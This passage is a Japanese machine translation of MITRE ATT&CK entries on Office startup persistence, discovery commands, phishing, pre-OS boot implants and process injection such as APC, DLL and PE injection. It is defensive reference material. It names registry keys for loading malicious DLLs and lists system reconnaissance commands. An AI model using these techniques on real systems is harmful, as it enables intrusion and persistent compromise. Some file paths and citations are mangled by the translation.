また、アプリケーションの検索順序を乗っ取ることで、ベースとなるテンプレートの場所を自分のものに変更することができます。例えば、Word 2016は、<code>C:˜Program Files (x86)‾‾Microsoft Office‾‾Office16‾</code>の下にあるNormal.dotmを最初に検索します。レジストリキーのGlobalDotNameを変更することで、アプリケーションの起動時に読み込まれるテンプレートに、任意の場所、ファイル名、拡張子を指定することができます。GlobalDotNameを悪用するために、敵対者はまず、テンプレートを信頼できるドキュメントとして登録するか、信頼できる場所に配置する必要があるかもしれません。(引用:GlobalDotName 2019年6月)

マクロの使用に関するシステムまたは企業のセキュリティポリシーに応じて、敵対者はマクロを無制限に実行できるようにする必要があるかもしれません。
364
T1137.002 Officeアプリケーションの起動。オフィステスト 敵対者は、Microsoft Officeの「Office Test」レジストリキーを悪用して、侵入したシステムでの持続性を獲得する可能性があります。Office Testレジストリキーは、Officeアプリケーションが起動するたびに実行される任意のDLLを指定できるようになっています。このレジストリキーは、Microsoft社がOfficeアプリケーションの開発時にテストやデバッグ目的でDLLをロードするために使用されると考えられています。このレジストリキーは、Officeのインストール時にデフォルトでは作成されません。(引用元:Hexacorn Office Test)(引用元:Palo Alto Office Test Sofacy)

Office Test機能のためのユーザーレジストリキーとグローバルレジストリキーが存在します。

* <code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>

敵対者は、このレジストリキーを追加して、WordやExcelなどのOfficeアプリケーションが起動するたびに実行される悪意のあるDLLを指定することができます。
365
T1137.003 オフィスアプリケーションのスタートアップ。Outlook Forms 侵入者は、Microsoft Outlookのフォームを悪用して、侵入したシステムでの持続性を確保することがあります。Outlookフォームは、Outlookメッセージの表示や機能のテンプレートとして使用されます。カスタムOutlookフォームを作成すると、敵対者が同じカスタムOutlookフォームを使用して特別に細工した電子メールを送信したときにコードが実行される。(引用:SensePost Outlook Forms)

悪意のあるフォームがユーザーのメールボックスに追加されると、Outlookが起動したときに読み込まれる。悪意のあるフォームは、敵対者が特別に細工した電子メールをユーザーに送信すると実行される。(引用:SensePost Outlook Forms
366
T1137.004 Officeアプリケーションの起動。Outlookのホームページ 侵入者は、Microsoft Outlookのホームページ機能を悪用して、侵入したシステムでの持続性を確保することがあります。Outlook Home Page は、Outlook フォルダの表示をカスタマイズするために使用される従来の機能です。この機能では、フォルダが開かれるたびに内部または外部のURLを読み込んで表示することができます。Outlook Home Pageで読み込まれたときにコードを実行する悪意のあるHTMLページを作成することができる。(引用:SensePost Outlook Home Page)

悪意のあるホームページがユーザーのメールボックスに追加されると、Outlookの起動時に読み込まれるようになる。悪意のあるホームページは、正しいOutlookフォルダが読み込まれたときに実行される。(引用:SensePost Outlook Home Page)
367
T1137.005 Officeアプリケーションの起動。Outlookルール 侵入者は、Microsoft Outlookのルールを悪用して、侵入したシステムでのパーシステンスを取得することがあります。Outlookのルールは、ユーザーが電子メールメッセージを管理するための自動動作を定義することができます。良心的なルールでは、例えば、特定の送信者からの特定の単語を含む電子メールを、Outlookの特定のフォルダに自動的に移動させることができます。悪意のあるOutlookルールを作成すると、敵対者が特別に細工した電子メールをそのユーザーに送信したときに、コード実行を引き起こすことができます。(引用:SilentBreak Outlook Rules)

悪意のあるルールがユーザーのメールボックスに追加されると、Outlookの起動時に読み込まれます。悪意のあるルールは、敵対者が特別に細工した電子メールをそのユーザーに送信すると実行されます。(引用:SilentBreak Outlook Rules)
368
T1201 パスワードポリシーの発見 侵入者は、企業ネットワーク内で使用されているパスワードポリシーの詳細情報にアクセスしようとすることがあります。ネットワークのパスワードポリシーは、[Brute Force](https://attack.mitre.org/techniques/T1110)によって推測したり解読したりするのが難しい複雑なパスワードを強制する方法です。これにより、敵対者は一般的なパスワードのリストを作成し、ポリシーに準拠した辞書攻撃やブルートフォース攻撃を行うことができます(例:パスワードの最小長が8である場合、「pass123」などのパスワードを試みない、アカウントをロックアウトしないためにロックアウトが6に設定されている場合、アカウントごとに3~4個以上のパスワードをチェックしないなど)。

パスワードポリシーは、Windows、Linux、およびmacOSシステムにおいて、<code>net accounts (/domain)</code>、<code>Get-ADDefaultDomainPasswordPolicy</code>、<code>chage -l <username></code>、<code>cat /etc/pam.d/common-password</code>、<code>pwpolicy getaccountpolicies</code>などがあります。(引用:Superuser Linux Password Policies) (引用:Jamf User Password Policies)
369
T1120 ペリフェラル・デバイス・ディスカバリー 敵対者は、コンピュータシステムに接続された周辺機器やコンポーネントに関する情報を収集しようとする場合があります。周辺機器には、キーボード、プリンタ、カメラ、スマートカードリーダー、リムーバブルストレージなど、さまざまな機能をサポートする補助的なリソースが含まれます。これらの情報は、システムやネットワーク環境に対する認識を高めるために使用されたり、さらなる行動のために使用されたりします。 370
T1069 パーミッショングループの発見 敵対者は、グループや権限の設定を見つけようとすることがあります。この情報は、どのユーザーアカウントやグループが利用可能か、特定のグループに属するユーザーのメンバーシップ、どのユーザーやグループが昇格した権限を持っているかを判断するのに役立ちます。 371
T1069.003 パーミッショングループの発見クラウドグループ 敵対者は、クラウドのグループと権限設定を見つけようとする可能性があります。クラウドの権限グループの知識は、環境内のユーザーやグループの特定の役割や、どのユーザーが特定のグループに関連しているかを敵対者が判断するのに役立ちます。

認証されたアクセスでは、権限グループを見つけるために使用できるツールがいくつかあります。<code>Get-MsolRole</code> PowerShellコマンドレットは、ExchangeとOffice 365アカウントのロールと権限グループを取得するために使用できます。(引用:Microsoft Msolrole)(引用:GitHub Raindance)

Azure CLI(AZ CLI)とGoogle Cloud Identity Provider APIも、権限グループを取得するためのインターフェースを提供しています。コマンド<code>az ad user get-member-groups</code>は、Azureのユーザーアカウントに関連するグループを一覧表示し、APIエンドポイント<code>GET https://cloudidentity.googleapis.com/v1/groups</code>は、Googleのユーザーが利用できるグループリソースを一覧表示します。(引用:Microsoft AZ CLI)(引用:Black Hills Red Teaming MS AD Azure, 2018)(引用:Google Cloud Identity API Documentation)
372
T1069.002 パーミッショングループの発見ドメイングループ 敵対者は、ドメインレベルのグループや許可設定を見つけようとすることがあります。ドメインレベルの権限グループの知識は、どのグループが存在し、どのユーザが特定のグループに属しているかを敵対者が判断するのに役立ちます。

[Net](https://attack.mitre.org/software/S0039)ユーティリティの<code>net group /domain</code>や、macOSの<code>dscacheutil -q group</code>、Linuxの<code>ldapsearch</code>などのコマンドは、ドメインレベルのグループをリストアップすることができます。
373
T1069.001 パーミッショングループの発見ローカルグループ 敵対者は、ローカルシステムのグループと権限設定を見つけようとすることがあります。ローカルシステムの権限グループを知ることは、どのグループが存在し、どのユーザが特定のグループに属しているかを敵対者が判断するのに役立ちます。

[Net](https://attack.mitre.org/software/S0039)ユーティリティの<code>net localgroup</code>や、macOSの<code>dscl .-list /Groups</code>(macOS)、<code>groups</code>(Linux)などのコマンドで、ローカルグループを一覧することができます。
374
T1566 フィッシング 敵対者は、被害者のシステムにアクセスするために、フィッシングメッセージを送信することがあります。すべてのフィッシングは、電子的に配信されるソーシャル・エンジニアリングです。フィッシングには、スピアフィッシングと呼ばれる標的型もあります。スピアフィッシングでは、特定の個人、企業、業界が敵対者の標的となります。

敵対者は、悪意のある添付ファイルやリンクを含む電子メールを被害者に送り、被害者のシステム上で悪意のあるコードを実行させることがあります。フィッシングは、ソーシャルメディア・プラットフォームのような第三者のサービスを介して行われることもあります。フィッシングには、信頼できる情報源を装うなどのソーシャルエンジニアリング技術が用いられることもあります。
375
T1598 フィッシング情報 敵対者は、ターゲティングの際に使用できる機密情報を引き出すために、フィッシングメッセージを送信することがあります。フィッシングとは、ターゲットを騙して情報を漏らそうとするもので、頻繁に認証情報やその他の実行可能な情報を得ることができます。

あらゆる形態のフィッシングは、電子的に配信されるソーシャル・エンジニアリングです。フィッシングは、スピアフィッシングと呼ばれる標的型のものもあります。スピアフィッシングでは、特定の個人、企業、業界が敵対者の標的となります。

また、敵対者は、電子メール、インスタントメッセージ、その他の電子的な会話手段を使って、直接情報を取得しようとすることもある。(引用: ThreatPost Social Media Phishing)(引用: TrendMictro Phishing)(引用: PCMag FakeLogin)(引用: Sophos Attachment)(引用: GitHub Phishery) 情報を得るためのフィッシングでは、情報を収集する理由のある情報源を装ったり(例: [Establish Accounts](https://attack.mitre.org/techniques/T1585)や[Compromise Accounts](https://attack.mitre.org/techniques/T1586)など)、緊急と思われるメッセージを複数回送信したりするなど、ソーシャルエンジニアリングの手法が頻繁に用いられます。
376
T1598.002 情報を得るためのフィッシングスピアフィッシングの添付ファイル 敵対者は、ターゲティング時に使用できる機密情報を引き出すために、悪意のある添付ファイルを付けたスピアフィッシング・メッセージを送信することがあります。スピアフィッシングとは、ターゲットを騙して情報(多くの場合、認証情報やその他の実行可能な情報)を引き出そうとする試みです。スピアフィッシングでは、情報を収集する理由のある情報源を装ったり(例:[Establish Accounts](https://attack.mitre.org/techniques/T1585)、[Compromise Accounts](https://attack.mitre.org/techniques/T1586))、緊急と思われるメッセージを複数回送信したりするなど、ソーシャルエンジニアリングの技術が頻繁に使用されます。

すべての形態のスピアフィッシングは、特定の個人、企業、または業界を対象とした電子的に配信されるソーシャルエンジニアリングです。このシナリオでは、敵対者はスピアフィッシングメールにファイルを添付し、通常、受信者が情報を入力してファイルを返送することを前提としています(引用:Sophos Attachment)(引用:GitHub Phishery)スピアフィッシングメールのテキストは、通常、ビジネスアソシエイトからの情報提供の要請など、ファイルを入力しなければならないもっともらしい理由を与えようとしています。また、過去に行った偵察活動(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)や[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))から得た情報を利用して、説得力のある信じやすい誘い文句を作ることもあります。
377
T1598.003 フィッシングによる情報提供スピアフィッシング・リンク 敵対者は、ターゲティング時に使用できる機密情報を引き出すために、悪意のあるリンクを含むスピアフィッシング・メッセージを送信することがあります。スピアフィッシングとは、ターゲットを騙して情報(多くの場合、認証情報やその他の実行可能な情報)を引き出そうとする試みです。

スピアフィッシングは、特定の個人、企業、業界を対象に、電子的に配信されるソーシャル・エンジニアリングです。このシナリオでは、悪意のある電子メールには、一般的にソーシャルエンジニアリングのテキストを伴うリンクが含まれており、ユーザーが積極的にURLをクリックしたり、ブラウザにコピー&ペーストしたりするよう誘導します(引用:TrendMictro Phishing)(引用:PCMag FakeLogin) 指定されたウェブサイトは、外観が正規のサイトに酷似しており、URLには正規のサイトの要素が含まれています。偽装サイトからは、ウェブフォームで情報が収集され、攻撃者に送信されます。攻撃者は、過去の偵察活動(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)や[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))から得た情報を利用して、説得力のある信じやすい誘い文句を作ることもあります。
378
T1598.001 情報を狙ったフィッシングスピアフィッシングサービス 敵対者は、サードパーティのサービスを利用してスピアフィッシング・メッセージを送信し、ターゲティングに利用できる機密情報を引き出すことがあります。スピアフィッシングとは、ターゲットを騙して情報(多くの場合、認証情報やその他の実行可能な情報)を引き出そうとする試みです。スピアフィッシングでは、情報を収集する理由のある情報源を装ったり(例:[Establish Accounts](https://attack.mitre.org/techniques/T1585)、[Compromise Accounts](https://attack.mitre.org/techniques/T1586))、一見すると緊急性の高いメッセージを複数回送信するなど、ソーシャルエンジニアリングの技術が頻繁に使用されます。

すべての形態のスピアフィッシングは、特定の個人、企業、または業界を対象とした電子的に配信されるソーシャルエンジニアリングです。このシナリオでは、敵対者は、さまざまなソーシャル・メディア・サービスや個人のウェブメールなど、企業が管理していないサービスを通じてメッセージを送信します(引用:ThreatPost Social Media Phishing)。これらのサービスは、企業よりも厳しいセキュリティ・ポリシーを持っていない可能性が高いです。一般的なスピアフィッシングと同様に、ターゲットとの信頼関係を構築したり、何らかの方法でターゲットの関心を引くことが目的です。例えば、ソーシャルメディアに偽のアカウントを作成し、従業員にメッセージを送って仕事の話を持ちかけることがあります。そうすることで、サービスやポリシー、環境に関する情報を尋ねるためのもっともらしい理由を作ることができます。また、過去の偵察活動(例:[ソーシャルメディア](https://attack.mitre.org/techniques/T1593/001)や[被害者所有のWebサイトの検索](https://attack.mitre.org/techniques/T1594))から得た情報を利用して、説得力のある信憑性の高い誘い文句を作ることもできます。
379
T1566.001 フィッシング: スピアフィッシングの添付ファイル 敵対者は、被害者のシステムへのアクセスを目的として、悪意のある添付ファイルを添付したスピアフィッシングメールを送信することがあります。スピアフィッシングの添付ファイルは、スピアフィッシングの一種です。スピアフィッシングの添付ファイルは、電子メールに添付されたマルウェアを使用するという点で、他の形態のスピアフィッシングとは異なります。すべてのスピアフィッシングは、特定の個人、企業、業界を対象に、電子的に配信されるソーシャルエンジニアリングです。このシナリオでは、敵対者はスピアフィッシングの電子メールにファイルを添付し、通常は[User Execution](https://attack.mitre.org/techniques/T1204)を利用して実行を促します。スピアフィッシングでは、信頼できる情報源を装うなどのソーシャルエンジニアリング技術が用いられることもあります。

添付ファイルには、Microsoft Office文書、実行ファイル、PDF、アーカイブファイルなど、さまざまな選択肢があります。添付ファイルを開くと(そして過去のプロテクトをクリックする可能性もある)、敵対者のペイロードが脆弱性を悪用したり、ユーザーのシステム上で直接実行されたりします。スピアフィッシングのメールには、通常、ファイルを開くべきもっともらしい理由が書かれており、ファイルを開くためにシステムの保護機能を回避する方法が説明されている場合があります。また、電子メールの境界防御を回避するために、zipファイルのパスワードなどの添付ファイルを復号する方法が記載されている場合もあります。敵対者は、添付された実行ファイルを文書ファイルに見せかけたり、あるアプリケーションを悪用するファイルを別のアプリケーションのファイルに見せかけたりするために、ファイルの拡張子やアイコンを頻繁に操作します。
380
T1566.002 フィッシング:Spearphishing Link 敵対者は、被害者のシステムへのアクセスを試みるために、悪意のあるリンクを含むスピアフィッシングメールを送信することがあります。リンク付きのスピアフィッシングは、スピアフィッシングの中でも特殊な形態です。リンク付きのスピアフィッシングは、他の形態のスピアフィッシングとは異なり、電子メールの添付ファイルを検査する防御機能を回避するために、電子メール自体に悪意のあるファイルを添付するのではなく、電子メールに含まれるマルウェアをダウンロードするためのリンクを使用する点が特徴です。

スピアフィッシングは、特定の個人、企業、業界を対象に、電子的に配信されるソーシャル・エンジニアリングです。この場合、悪意のある電子メールにはリンクが含まれています。一般的に、リンクにはソーシャルエンジニアリングのテキストが添付され、[User Execution](https://attack.mitre.org/techniques/T1204)を利用して、ユーザーが能動的にURLをクリックしたり、ブラウザにコピー&ペーストすることを要求します。訪問したWebサイトでは、エクスプロイトを使用してWebブラウザを危険にさらす可能性があります。また、ユーザーは、アプリケーション、ドキュメント、ZIPファイル、さらには、そもそものメールの口実に応じて実行ファイルをダウンロードするよう促されます。また、エンドシステムを直接悪用したり、電子メールの受信を確認したりすることを目的とした画像の埋め込みなど、電子メールリーダーと直接対話することを目的としたリンクが含まれている場合もあります(ウェブバグ/ウェブビーコンなど)。また、リンクは、保護されたアプリケーションや情報へのアクセスを得るために、OAuthトークンのような[Steal Application Access Token](https://attack.mitre.org/techniques/T1528)を目的とした悪意のあるアプリケーションにユーザーを誘導する可能性があります(引用:Trend Micro Pawn Storm OAuth 2017)。
381
T1566.003 フィッシング:サービスを利用したスピアフィッシング 敵対者は、被害者のシステムへのアクセスを目的として、サードパーティのサービスを介してスピアフィッシングメッセージを送信することがあります。サービスを利用したスピアフィッシングは、スピアフィッシングの一種です。

スピアフィッシングのすべての形態は、特定の個人、企業、または業界を対象とした電子的に配信されるソーシャルエンジニアリングです。このシナリオでは、敵対者は、さまざまなソーシャルメディアサービスや個人のウェブメールなど、企業が管理していないサービスを通じてメッセージを送信します。これらのサービスでは、企業よりも厳しいセキュリティポリシーが設定されていない可能性が高いです。一般的なスピアフィッシングと同様に、ターゲットとの信頼関係を構築したり、何らかの形でターゲットの関心を引くことが目的です。敵対者は、偽のソーシャルメディア・アカウントを作成し、従業員に求人情報のメッセージを送ります。これにより、環境で実行されているサービス、ポリシー、ソフトウェアについて尋ねるためのもっともらしい理由を作ることができます。

ソーシャルメディアを通じてターゲットとの関係を構築し、ターゲットが仕事用のコンピュータで使用している個人用ウェブメールサービスにコンテンツを送信するのが一般的な例です。これにより、攻撃者は仕事用アカウントのメール制限を回避することができ、ターゲットは期待していたファイルなので開く可能性が高くなります。ペイロードが期待通りに動作しない場合、敵対者は通常の通信を継続し、動作させる方法についてターゲットとトラブルシューティングを行うことができます。
382
T1542 プレOSブート 敵対者は、システム上の永続性を確立する方法として、OS起動前のメカニズムを悪用することがあります。コンピュータの起動プロセスでは、OSの前にファームウェアやさまざまな起動サービスがロードされます。

敵対者は、BIOS (Basic Input/Output System)やUEFI (Unified Extensible Firmware Interface)などのブートドライバやファームウェアのデータを上書きして、オペレーティングシステムよりも下の層のシステムに持続的にアクセスすることがあります。このようなレベルのマルウェアは、ホストソフトウェアベースの防御では検出できないため、検出が特に困難になります。
383
T1542.003 プレOSブート。ブートキット 敵対者は、システム上に留まるためにブートキットを使用することがあります。ブートキットは、オペレーティングシステムの下の層に存在するため、組織がブートキットの使用を疑い、それに応じて行動しない限り、完全な修復を行うことが困難になる場合があります。

ブートキットとは、マスターブートレコード(MBR)やボリュームブートレコード(VBR)など、ハードドライブのブートセクターを変更するマルウェアのことです。(引用:Mandiant M Trends 2016)MBRは、BIOSによるハードウェアの初期化が完了した後、最初にロードされるディスクのセクションです。ブートローダーの場所である。ブートドライブに生のアクセス権を持つ敵対者は、この領域を上書きし、起動時の実行を通常のブートローダーから敵対者のコードに転換させることができます。(Citation: Lau 2011)

MBR は、ブートプロセスの制御を VBR に渡します。MBRの場合と同様に、ブート・ドライブへの生のアクセス権を持つ敵対者は、VBRを上書きして起動時の実行を敵対者のコードに委ねることができます。
384
T1542.002 プレOSブート。コンポーネントファームウェア 敵対者は、コンポーネントのファームウェアを変更して、システムに残留させることがあります。一部の敵対者は、高度な手段を用いてコンピュータ・コンポーネントを侵害し、オペレーティング・システムやメイン・システム・ファームウェアまたはBIOSの外部で敵対者のコードを実行する悪意のあるファームウェアをインストールすることがあります。この手法は、[システム・ファームウェア](https://attack.mitre.org/techniques/T1542/001)と類似していますが、同じ能力やレベルの整合性チェックを持たない他のシステム・コンポーネントやデバイスに対して行われる可能性があります。

悪意のあるコンポーネント・ファームウェアは、アクセスを維持するための典型的な障害やハードディスクの再イメージにもかかわらず、システムへの永続的なレベルのアクセスを提供するだけでなく、ホスト・ソフトウェアベースの防御や整合性チェックを回避する方法でもあります。
385
T1542.004 プレOSブート。ROMMONkit 敵対者は、ROMモニター(ROMMON)を悪用して、不正なファームウェアに敵対者のコードを読み込ませ、持続的なアクセスを提供したり、検出が困難なデバイスの動作を操作したりすることがあります。(Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)


ROMMONは、シスコのネットワークデバイスのファームウェアで、プラットフォームの電源投入時やリセット時に、ハードウェアやソフトウェアを初期化するブートローダー、ブートイメージ、ブートヘルパーとして機能します。TFTP Boot](https://attack.mitre.org/techniques/T1542/005)と同様に、敵対者はROMMONイメージをローカルまたはリモート(TFTPなど)から敵対者コードでアップグレードし、デバイスを再起動して既存のROMMONイメージを上書きします。これにより、敵対者は、検出が困難な方法でROMMONを更新し、システムに永続性を持たせることができます。
386
T1542.001 プレOSブート。システムファームウェア BIOS(Basic Input/Output System)やUEFI(Unified Extensible Firmware Interface)、EFI(Extensible Firmware Interface)は、コンピュータのOSとハードウェアの間のソフトウェア・インターフェースとして動作するシステム・ファームウェアの一例です。(引用:Wikipedia BIOS) (引用:Wikipedia UEFI) (引用:UEFIについて)

BIOSや(U)EFIのようなシステムファームウェアは、コンピュータの機能を支えるものであり、悪意のある活動を実行または支援するために、敵対者によって変更される可能性があります。システムファームウェアを上書きする機能が存在するため、洗練された敵対者は、検出が難しいかもしれないシステム上の永続的な手段として、悪意のあるファームウェアアップデートをインストールする手段を得る可能性があります。
387
T1542.005 プレOSブート。TFTPブート 敵対者は、ネットブートを悪用して、TFTP(Trivial File Transfer Protocol)サーバーから未承認のネットワークデバイスのOSをロードする可能性があります。TFTPブート(ネットブート)は、ネットワーク管理者が集中管理サーバーから設定制御されたネットワークデバイスイメージをロードするために一般的に使用されます。

敵対者は、悪意のあるTFTPサーバの使用を指定してネットワークデバイスの設定を操作し、[システムイメージの変更](https://attack.mitre.org/techniques/T1601)と併用することで、デバイスの起動時やリセット時に変更されたイメージを読み込むことができます。この不正なイメージを利用することで、ネットワーク機器の設定を変更したり、機器に悪意のある機能を追加したり、バックドアを導入したりして、ネットワーク機器の制御を維持しつつ、標準的な機能を利用して検出を最小限に抑えることができます。この手法は、[ROMMONkit](https://attack.mitre.org/techniques/T1542/004)と類似しており、ネットワークデバイスが修正されたイメージを実行することになる可能性があります。(引用:Cisco Blog Legacy Device Attacks)
388
T1057 プロセスディスカバリー 敵対者は、システム上の実行中のプロセスに関する情報を取得しようとする可能性があります。取得した情報は、ネットワーク内のシステムで実行されている一般的なソフトウェアやアプリケーションを理解するために使用される可能性があります。

Windows環境では、[cmd](https://attack.mitre.org/software/S0106)経由で[Tasklist](https://attack.mitre.org/software/S0057)ユーティリティを使用したり、[PowerShell](https://attack.mitre.org/techniques/T1059/001)経由で<code>Get-Process</code>を使用して、実行中のプロセスの詳細を取得することができます。プロセスに関する情報は、<code>CreateToolhelp32Snapshot</code>などの[Native API](https://attack.mitre.org/techniques/T1106)コールの出力からも抽出できます。MacやLinuxでは、これは<code>ps</code>コマンドで実現できます。また、敵は/procでプロセスを列挙することもできます。
389
T1055 プロセス注入 敵対者は、プロセスベースの防御を回避したり、特権を昇格させたりするために、プロセスにコードを注入することがあります。プロセスインジェクションとは、別のライブプロセスのアドレス空間で任意のコードを実行する方法です。別のプロセスのコンテキストでコードを実行すると、そのプロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、特権が昇格する可能性があります。また、プロセス・インジェクションによる実行は、正当なプロセスの下でマスクされるため、セキュリティ製品による検出を回避できる可能性があります。

プロセスにコードを注入する方法は数多くあり、その多くは正当な機能を悪用しています。

より洗練されたサンプルでは、複数のプロセス・インジェクションを実行してモジュールを分割し、名前付きパイプやその他のプロセス間通信(IPC)メカニズムを通信チャネルとして利用することで、検知をさらに回避することができます。
390
T1055.004 プロセスインジェクション。非同期プロシージャコール 敵対者は、非同期プロシージャコール (APC) キューを介してプロセスに悪意のあるコードを注入し、プロセスベースの防御を回避したり、特権を昇格させたりする可能性があります。APCインジェクションとは、別のライブプロセスのアドレス空間で任意のコードを実行する方法です。

APCインジェクションは、プロセスのスレッドのAPCキュー(引用元:Microsoft APC)に悪意のあるコードを添付することで実行されるのが一般的です。キューイングされたAPC関数は、スレッドが変更可能な状態になったときに実行されます。(引用:Microsoft APC) 既存の被害者プロセスへのハンドルは、まず<code>OpenThread</code>などのWindowsのネイティブAPIコールで作成されます。

「Early Bird injection」と呼ばれるAPCインジェクションのバリエーションでは、APCを介してプロセスのエントリーポイント(そして潜在的にはその後のアンチマルウェアフック)の前に悪意のあるコードを書き込んで実行することができる中断したプロセスを作成します。(引用:CyberBit Early Bird Apr 2018) AtomBombing (引用:ENSIL AtomBombing Oct 2016) は、APCを利用して、グローバルアトムテーブルにあらかじめ書き込まれた悪意のあるコードを呼び出す別のバリエーションです。(引用:Microsoft Atom Table)

他のプロセスのコンテキストでコードを実行すると、そのプロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、場合によっては昇格した特権が得られる可能性があります。また、APCインジェクションによる実行は、正当なプロセスの下でマスクされるため、セキュリティ製品による検知を回避できる可能性があります。
391
T1055.001 プロセスインジェクション。ダイナミック・リンク・ライブラリ・インジェクション 敵対者は、プロセスベースの防御を回避したり、特権を昇格させたりするために、ダイナミックリンクライブラリ(DLL)をプロセスに注入することがあります。

DLLインジェクションは、新しいスレッドを起動してDLLをロードする前に、ターゲットプロセスの仮想アドレス空間にDLLへのパスを書き込むことで実行されます。書き込みは、<code>VirtualAllocEx</code>や<code>WriteProcessMemory</code>などのWindowsのネイティブAPIコールで実行し、<code>CreateRemoteThread</code>で起動します(DLLのロードを担当する<code>LoadLibrary</code>APIを呼び出します)。(引用:Elastic Process Injection 2017年7月)

反射型DLL注入(セルフマッピングDLLをプロセスに書き込む)やメモリモジュール(プロセスに書き込む際にDLLをマッピングする)などのこの方法のバリエーションは、アドレス再配置の問題を克服するとともに、実行を呼び出すための追加のAPIも克服しています(これらの方法は、<code>LoadLibrary</code>の機能を手動で事前に実行することで、メモリ内のファイルをロードして実行するからです)。(引用:Elastic HuntingNMemory 2017年6月)(引用:Elastic Process Injection 2017年7月)

他のプロセスのコンテキストでコードを実行すると、そのプロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、特権が昇格する可能性があります。また、DLLインジェクションによる実行は、正当なプロセスの下でマスクされるため、セキュリティ製品の検知を回避できる可能性があります。
392
T1055.011 プロセスインジェクション。エクストラウィンドウのメモリインジェクション 敵対者は、プロセスベースの防御を回避したり、特権を昇格させたりするために、Extra Window Memory (EWM)を介してプロセスに悪意のあるコードを注入することがあります。

ウィンドウを作成する前に、グラフィカルなWindowsベースのプロセスは、外観や動作(データの入出力を処理する関数であるウィンドウズプロシージャを介して)を規定するウィンドウズクラスに登録する必要があります(引用:Microsoft Window Classes)。このEWMは、そのウィンドウに固有のデータを格納するためのもので、その値を設定・取得するための特定のアプリケーション・プログラミング・インターフェース(API)関数があります。(引用:Microsoft GetWindowLong関数) (引用:Microsoft SetWindowLong関数)

EWMは小さいながらも、32ビットのポインタを格納するのに十分な大きさがあり、ウィンドウズプロシージャを指すのによく使われます。マルウェアは、プロセスのメモリの共有セクションにコードを書き込み、そのコードへのポインタをEWMに置き、実行制御をプロセスのEWM内のアドレスに戻すことで実行を呼び出すといった攻撃の連鎖の一部として、このメモリロケーションを利用する可能性があります。

EWMへのインジェクションによって与えられた実行は、ターゲットプロセスのメモリへのアクセスと、場合によっては昇格した特権の両方を可能にする可能性があります。また、ペイロードを共有セクションに書き込むことで、<code>WriteProcessMemory</code>や<code>CreateRemoteThread</code>などの高度に監視されたAPIコールの使用を回避することができます。(引用:Elastic Process Injection July 2017) より洗練されたマルウェアサンプルは、ターゲットプロセスの実行可能部分内に悪意のあるペイロードを書き換えるウィンドウズプロシージャやその他のシステム機能の組み合わせをトリガーすることで、データ実行防止(DEP)などの保護メカニズムをバイパスする可能性もあります。 (引用:MalwareTech Power Loader Aug 2013) (引用:WeLiveSecurity Gapz and Redyms Mar 2013)

他のプロセスのコンテキストでコードを実行すると、そのプロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、特権が昇格する可能性があります。また、EWMインジェクションによる実行は、正当なプロセスの下でマスクされるため、セキュリティ製品による検知を回避できる可能性があります。
393
T1055.002 プロセス・インジェクション。ポータブル実行ファイルインジェクション 敵対者は、プロセスベースの防御を回避したり、特権を昇格させたりするために、ポータブル実行ファイル(PE)をプロセスに注入することがあります。

PE インジェクションは、一般的に、コードを(おそらくディスク上のファイルを介さずに)対象プロセスの仮想アドレス空間にコピーしてから、新しいスレッドを介して起動することで実行されます。書き込みは、<code>VirtualAllocEx</code>や<code>WriteProcessMemory</code>などのWindowsのネイティブAPIコールで実行され、<code>CreateRemoteThread</code>や追加のコード(例:シェルコード)で起動されます。インジェクションされたコードが移動することで、メモリ参照をリマップする機能が必要になります。(引用:Elastic Process Injection July 2017)

他のプロセスのコンテキストでコードを実行すると、そのプロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、特権が昇格する可能性があります。また、PEインジェクションによる実行は、正当なプロセスの下でマスクされるため、セキュリティ製品の検知を回避できる可能性があります。
394
T1055.009 プロセスインジェクション。プロセスメモリ 敵対者は、/procファイルシステムを介してプロセスに悪意のあるコードを注入し、プロセスベースの防御を回避したり、特権を昇格させたりする可能性があります。

プロセスメモリインジェクションは、/procファイルシステム(<code>/proc/[pid]</code>)を介してプロセスのメモリを列挙し、利用可能なガジェット/命令を含むリターン指向プログラミング(ROP)のペイロードを作成します。実行中の各プロセスには独自のディレクトリがあり、そこにはメモリマッピングが含まれています。プロックメモリインジェクションは、一般的に、/procファイルシステムが提供するメモリマッピングを使用してターゲットプロセスのスタックを上書きすることで実行されます。この情報を利用して、スタックを含むオフセットやガジェット(悪意のあるペイロードを構築するために使用できるプログラム内の命令)を列挙することができますが、ASLR(Address Space Layout Randomization)などのプロセスメモリ保護機能では隠れてしまいます。一旦列挙されると、<code>/proc/[pid]/maps</code>内のターゲットプロセスのメモリマップは、ddを使って上書きすることができます。(引用:Uninformed Needle)(引用:GDS Linux Injection)(引用:DD Man)

[Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006)などの他の技術は、ターゲットプロセスに利用可能なガジェットを増やすために使用されることがあります。Process Hollowing](https://attack.mitre.org/techniques/T1055/012)と同様に、proc memory injectionは、子プロセス(sleepのバックグラウンドコピーなど)を対象とする場合があります。(引用:GDS Linux Injection)

他のプロセスのコンテキストでコードを実行すると、そのプロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、場合によっては昇格した特権が与えられる可能性があります。また、プロックメモリインジェクションによる実行は、正当なプロセスの下でマスクされるため、セキュリティ製品による検知を回避できる可能性があります。
395
T1055.013 プロセスインジェクション。プロセスドッペルギャンギング 敵対者は、プロセスベースの防御を回避したり、特権を昇格させたりするために、プロセス・ドッペルギャンギングによって悪意のあるコードをプロセスに注入する可能性があります。

